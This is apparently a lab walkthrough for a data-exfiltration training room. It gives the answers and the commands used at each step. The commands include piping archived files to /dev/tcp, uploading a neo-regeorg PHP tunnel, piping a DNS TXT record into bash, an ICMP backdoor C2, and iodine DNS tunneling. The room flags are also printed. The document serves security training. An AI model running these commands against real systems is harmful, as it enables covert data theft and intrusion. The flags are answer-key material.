Skip to content

Data Exfiltration Banner

Data Exfiltration Logo

Data Exfiltration

This guide contains the answer and steps necessary to get to them for the Data Exfiltration room.

Table of contents

Data Exfiltration

  1. In which case scenario will sending and receiving traffic continue during the connection?

This answer can be found in the text.

Click for answerTunneling

  1. In which case scenario will sending and receiving traffic be in one direction?

This answer can be found in the text.

Click for answerTraditional data exfiltration

  1. In the next task, we will be discussing how data exfiltration over the TCP socket works!

Exfiltration using TCP socket

  1. Exfiltration using TCP sockets relies on ______ protocols!

The answer can be found in the text.

Click for answerNon-standard

  1. Now apply what we discussed to exfiltrate data over the TCP socket! Once you exfiltrate data successfully, hitCompletedto move on to the next task!

We need to ssh into the jump server and setup a listener that outputs the result to a file.

ssh thm@10.10.66.20
nc -nlvp 1337 > /tmp/task4-creds.data

Next we ssh into the victim1 machine through the jumpserver.

ssh thm@10.10.66.20
ssh thm@victim1.thm.com

TCP Listener

Next we compress and encode the data we want to exfiltrate in the 'task4' folder.

tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/1337

This command will also send the data over the TCP socket.

TCP Exfiltrate

Now that the files have been transfered to the jump server, we can decode en decompress the archive to get to the files.

dd conv=ascii if=task4-creds.data | base64 -d > task4-creds.tar
tar xvf task4-creds.tar

TCP Files

Exfiltration using SSH

  1. All packets sent using the Data Exfiltration technique over SSH are encrypted! (T=True/F=False)

The answer can be found in the text.

Click for answerT

  1. Replicate the steps to transfer data over the SSH client. Once you transfer the file successfully, hitCompletedand move on to the next task!

On victim 1 we can archive the folder and send it directly through the SSH client.

tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"

SSH Exfiltrate

SSH Files

Exfiltrate using HTTP(S)

  1. Check the Apache log file onweb.thm.comand get the flag!

After ssh'ing into the web server through the jumpserver, we can look at the log file.

sudo cat /var/log/apache2/access.log

HTTP Flag 1

This gives us the flag in base64 format. Decoding this gives us the flag.

echo VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= | base64 -d

HTTP Flag 1 Decoded

Click for answerTHM{H77P-G37-15-f0un6}

  1. When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?

First thing to do to create our HTTP tunnel using neo-regeorg is to generate a key

python3 neoreg.py generate -k thm

HTTP Neo Key

Now we can upload the tunnel to the webserver at http://10.10.230.138/uploader with the key 'admin'.

HTTP Upload Tunnel

Next we can start the tunnel using the key and the URL to the uploaded file.

python3 neoreg.py -k thm -u http://10.10.230.138/uploader/files/tunnel.php

HTTP Neo Tunnel

When this is done we can use curl to tunnel to the flag server. The proxy is bound to our machine with 127.0.0.1:1080.

curl --socks5 127.0.0.1:1080 http://172.20.0.120:80

HTTP Get Flag

This is not our flag. But it does point us to the correct page.

curl --socks5 127.0.0.1:1080 http://172.20.0.120:80/flag

HTTP Flag 2

Click for answerTHM{H77p_7unn3l1n9_l1k3_l337}

Exfiltration using ICMP

  1. In which ICMP packet section can we include our data?

This answer can be found in the text.

Click for answerdata

  1. Follow the technique discussed in this task to establish a C2 ICMP connection between JumpBox and ICMP-Host. Then execute the "getFlag" command. What is the flag?

On the icmp server we initiate the icmpdoor binary and on the jump server we initiate the icmp-cnc binary.

sudo icmpdoor -i eth0 -d 192.168.0.133

sudo icmp-cnc -i eth1 -d 192.168.0.121

Now that a connection has been established, we can send commands to the icmp server.

Icmp Get Flag

Click for answerTHM{g0t-1cmp-p4k3t!}

DNS Configurations

  1. Once the DNS configuration works fine, resolve theflag.thm.comdomain name. What is the IP address?

Simply using the command dig +short flag.thm.com should give us the ip of the flag server.

However, if we want to use the attack box itself, we must change its DNS settings. Edit the nameserver in the following file to 10.10.230.138:

nano /etc/resolv.conf

Now this command will also work from our attack box.

DNS IP

Click for answer172.20.0.120

Exfiltration over DNS

  1. What is the maximum length for the subdomain name (label)?

The answer can be found in the text.

Click for answer63

  1. The Fully Qualified FQDN domain name must not exceed ______characters.

The answer can be found in the text.

Click for answer255

  1. Execute the C2 communication over the DNS protocol of the flag.tunnel.com. What is the flag?

We need to replicate the command we just did to retrieve the contents of the TXT file for the flag.tunnel.com server.

After uploading our script ins base64 format as a TXT entry, we retrieved the content of the TXT entry with:

DNS EXFILTRATION TXT

dig +short -t TXT script.tunnel.com

We named the TXT entry 'script' hence the subdomain.

We can do the same but for the flag.tunnel.com TXT entry.

dig +short -t TXT flag.tunnel.com

DNS EXFILTRATION BASE64

We need to decode the string after removing the quotes.

dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d

DNS EXFILTRATION CONTENTS

This gives us a script to get our flag. We can execute it with:

dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d | bash

DNS EXFILTRATION FLAG

Click for answerTHM{C-tw0-C0mmun1c4t10ns-0v3r-DN5}

DNS Tunneling

  1. When the iodine connection establishes to Attacker, run theifconfigcommand. How many interfaces are? (including the loopback interface)

First we add the A and NS records to the DNS server to point to our attackbox.

DSN TUNNEL A

DNS TUNNEL NS

Now that traffic pointed towards t1.tunnel.com will be directed to our machine, we can setup the iodine server on the attackbox.

sudo /sbin/iodined -f -c -P thmpass 10.1.1.1/24 t1.tunnel.com

DNS TUNNEL SERVER

Then we setup the client side on the jump machine.

sudo iodine -f -P thmpass t1.tunnel.com

DNS TUNNEL CLIENT

We can now check how many interfaces are active on the jump machine.

DNS TUNNEL INTERFACES

Click for answer4

  1. What is the network interface name created by iodined?

There is one interface that was added after establishing the connection and it is the top one in the previous image.

Click for answerdns0

  1. Use the DNS tunneling to prove your access to the webserver, http://192.168.0.100/test.php. What is the flag?

Now that the DNS tunnel is in place we can connect to the jump box through the DNS tunnel via ssh.

ssh thm@10.1.1.2 -4 -N -f -D 1080

This creates an ssh session with -D to enable the dynamic port forwarding feature to use the SSH session as a proxy using only IPv4 (-4).

DNS TUNNEL SSH

At first I thought something didn't work but later found out the the ssh session was backgrounded with the -f argument.

Now we can use two methods to connect to the local machine. Curl or Proxychains.

Using curl can be done with the following command:

curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

DNS TUNNEL CURL FLAG

For Proxychains we must first add the proxy to the config file.

nano /etc/proxychains4.conf

# Add at the end
socks5 127.0.0.1 1080

Now we can also use Proxychains with:

proxychains curl http://192.168.0.100/test.php

DNS TUNNEL PROXYCHAINS FLAG

Click for answerTHM{DN5-Tunn311n9-1s-c00l}